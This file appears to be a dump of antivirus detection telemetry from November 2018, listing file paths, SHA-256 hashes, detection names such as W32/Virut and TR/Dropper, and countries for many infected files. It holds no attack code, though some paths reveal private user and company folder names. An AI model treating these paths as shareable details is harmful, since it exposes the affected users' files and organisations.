  Row(detection=Row(filename='dogetolf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DoGETOLF.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dgnnaiff.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DgNNAiFf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='shpsqjzs.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\shpSQjZs.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tyiswycr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\tYISwycr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbgwkajg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\nbGwkAjG.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nzhstrpg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\NZhsTRpg.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lvevsxnu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LveVsXnu.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='axanjhek.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\axaNjheK.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='woqtdkpg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wOqTdkPg.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uuchcwfw.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\UuCHCWFw.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nkhsiceu.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\NKHsIcEU.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smkydvfr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\smkYDvfr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zlvgjaes.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ZLVGjAES.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mcmsstgx.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\MCmsSTgx.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wptxcudr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wPtXcUdr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jbolmncj.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\jBoLmnCJ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pesbbnla.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\pesBBNla.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='voxfujsh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\VOXFUJsh.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dqnpbawp.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DqNpbaWp.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vglcoltc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\vgLCOlTc.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='njvxaebp.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\NJVXAEbP.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mlrwzlkl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\mLRwZlkl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hfcpjrea.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hfCpJREa.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oiomhpbv.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\OiomhPBv.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hsgcodkq.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hsgCODkq.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qlwvivqn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\qLWviVqn.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='homflsox.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\HoMfLsOX.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jdchkqoz.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\JdChkQOZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eutcbbpe.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\euTcbBPe.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xnbutjnh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\XNbutJNH.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pnpgagda.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\pNpgAgDa.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='epysoisi.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\epYsOIsI.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fbftnggx.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\fBfTNGGx.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='akylwbtc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\AkylWbTC.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dbgitaam.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\dBGiTaam.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qbiolxxf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\QBIoLXxf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ppsshwmq.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\pPsSHwmq.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\72A55FB04DF96203C636A52AA2824C07558E785BE34E646FE3749EE2A19EB26B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\72A55FB04DF96203C636A52AA2824C07558E785BE34E646FE3749EE2A19EB26B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=9024000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='72c8e82804e78a3ea589f1ecc38fde6259dbac71c5818c433d84b4a07be3e596', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T11:19:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095425-339dbb83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98a83c06\\AVSCAN-20181102-095059-148C2F4B\\AVSCAN-20181102-095425-339DBB83', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='报总部201306投顾提成表.xls', filepath='F:\\CJ\\U盘备份\\20160613(新老划断资料勿删除)\\工作资料\\财富证券工作资料\\工作资料\\投顾资料\\资料\\投顾业绩提成明细\\2013\\公司上报提出表\\报总部201306投顾提成表.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T01:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='forma1.buhg.2011.xls', filepath='E:\\FreeFiles\\EIAS\\Отчетность\\2013\\до 30.04.2013\\FORMA1.BUHG.2011.xls', filesize=2048000, name='W97M/Dldr.Agent.18758.#M1.#R1'), hash='73345849706f83afbbde98271376d72f2101b73ea099ffa6ddc7c469e1733711', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:01:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4e8tbo0v3.vir', filepath='\\\\?\\C:\\Program Files\\4E8TBO0V3O\\4E8TBO0V3.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6qknn5y37.vir', filepath='\\\\?\\C:\\Program Files\\6QKNN5Y378\\6QKNN5Y37.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\733E354C150B4149737AE67AFD29DC8E971759219779881F1F0375C6118FB5B9', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='\\\\?\\C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='\\\\?\\C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:34:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='\\\\?\\C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='\\\\?\\C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='\\\\?\\C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='\\\\?\\C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\733E354C150B4149737AE67AFD29DC8E971759219779881F1F0375C6118FB5B9', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:36:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='high tv chanelle.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\high tv chanelle.exe', filesize=768000, name='TR/Dldr.Zampol.sgcmb.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:34Z'), dt=datetime.date(2018, 11, 2)),
